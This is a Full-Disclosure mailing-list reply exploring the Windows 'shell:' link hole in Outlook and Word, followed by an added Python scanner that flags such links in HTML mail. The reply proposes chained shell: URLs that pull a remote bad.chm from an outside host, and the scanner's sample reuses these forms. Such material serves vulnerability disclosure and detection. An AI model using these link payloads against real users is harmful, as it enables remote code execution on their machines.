
Re: [Full-Disclosure] MSN Messenger is vulnerable to the shell: hole




<!-- 

Ctrl+clicking a shell:windows\\notepad.exe link in Microsoft 
Word 10.2627.3311 launches Notepad. 

 -->

this can be very interesting. The same in Outlook 2003 both html 
and rich text. Good thing the named temp file deposits were 
magically patched.

As Andreas Sandblad mentioned the other day the assigned 
application will open depending on the file extension.

In Outlook 2003

shell:foo.hta will open an empty Html Application window
shell: foo.chm will run hh.exe with an error
shell: foo.js will run Windows Scripting Host with an error 
showing the full path where it is looking to run foo.js 
shell: foo.eml completely screws up Outlook Express with a 
series of errors

the idea then would be to run directly through the non-existent 
file it is trying to open e.g:

shell:foo.chm::http://www.malware.com//bad.chm::/foo.html

or

shell:C:foo.mht!http://www.malware.com//bad.chm::/foo.html

either that, or get something into shell:foo.hta or try to 
resurrect the named file in the temp. Lot of possibilities 
including embedding the file directly into the mail message 
and linking to it.

All needs to be thoroughly examined though. Which would be 
unfortunate for the peculiar completely clueless few who think 
that you just "flick" a switch and the fireworks begin.

-- 
http://www.malware.com



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
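
A defensive check for the link forms discussed in the message above, as an added example that is not part of the original post: it pulls URL attributes out of an HTML mail body, normalizes them, and flags `shell:` links, reporting the extension that selects the handler and whether a second handler or a remote URL is chained on. The function names, the attribute list and the sample body (with example.invalid as the host) are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Attributes that can carry a URL in an HTML mail body (assumed list, not exhaustive).
URL_ATTRS = {"href", "src", "action", "background"}
# A second handler chained on: "::" or "!" followed by another scheme.
CHAINED = re.compile(r"::|![a-z][a-z0-9+.-]*:", re.I)
REMOTE = re.compile(r"(?:https?|ftp)://", re.I)
# First file extension in the target, after an optional drive prefix such as "C:".
EXT = re.compile(r"(?:[A-Za-z]:)?[^:!?#]*?\.([A-Za-z0-9]{1,5})(?=$|[:!?#])")

class LinkCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser has already decoded character references in attribute values.
        self.urls += [v for k, v in attrs if k in URL_ATTRS and v]

def classify(url):
    """Return a finding dict for a shell: link, or None for anything else."""
    # Undo percent-encoding, then drop whitespace and control characters.
    norm = re.sub(r"[\x00-\x20]+", "", unquote(url))
    if not norm.lower().startswith("shell:"):
        return None
    target = norm[len("shell:"):]
    ext = EXT.match(target)
    return {"url": url,
            "extension": ext.group(1).lower() if ext else None,
            "chained": bool(CHAINED.search(target)),
            "remote": bool(REMOTE.search(target))}

def scan_html(body):
    parser = LinkCollector()
    parser.feed(body)
    parser.close()
    return [f for f in map(classify, parser.urls) if f]

# Constructed sample body; example.invalid stands in for any remote host.
SAMPLE = """<html><body>
<a href="shell:foo.hta">a</a>
<a href="shell:foo.chm::http://example.invalid/x.chm::/foo.html">b</a>
<a href="SHELL:C:foo.mht!http://example.invalid/x.chm::/foo.html">c</a>
<a href="&#115;hell:%66oo.js">d</a>
<a href="http://example.invalid/shell:foo">e</a>
</body></html>"""
```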